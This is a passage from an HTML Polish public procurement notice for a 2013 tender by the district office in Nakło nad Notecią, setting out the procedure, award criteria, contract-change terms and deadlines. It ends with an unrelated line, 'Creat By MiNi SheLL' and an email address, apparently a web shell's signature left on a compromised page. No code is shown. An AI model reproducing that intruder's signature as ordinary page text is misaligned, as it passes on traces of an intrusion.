<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia umowy zawiera projekt umowy stanowiący załącznik nr 4 
do SIWZ. 

Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku do treści oferty w zakresie:
1)	Zmiany terminu realizacji zamówienia,
2)	ustawowej zmiany stawki podatku VAT,

Warunkiem wprowadzenia zmian w umowie jest pisemne zwrócenie się o wyrażenie zgody jednej ze stron na dokonanie zmiany w umowie z podaniem uzasadnienia faktycznego oraz wyrażenie zgody drugiej strony. Wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności takich zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-nakielski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nakle nad Notecią 
ul. Dąbrowskiego 54 89-100 Nakło nad Notecią.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 07:45, miejsce: Starostwo Powiatowe w Nakle nad Notecią 
ul. Dąbrowskiego 54 89-100 Nakło nad Notecią 
Biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com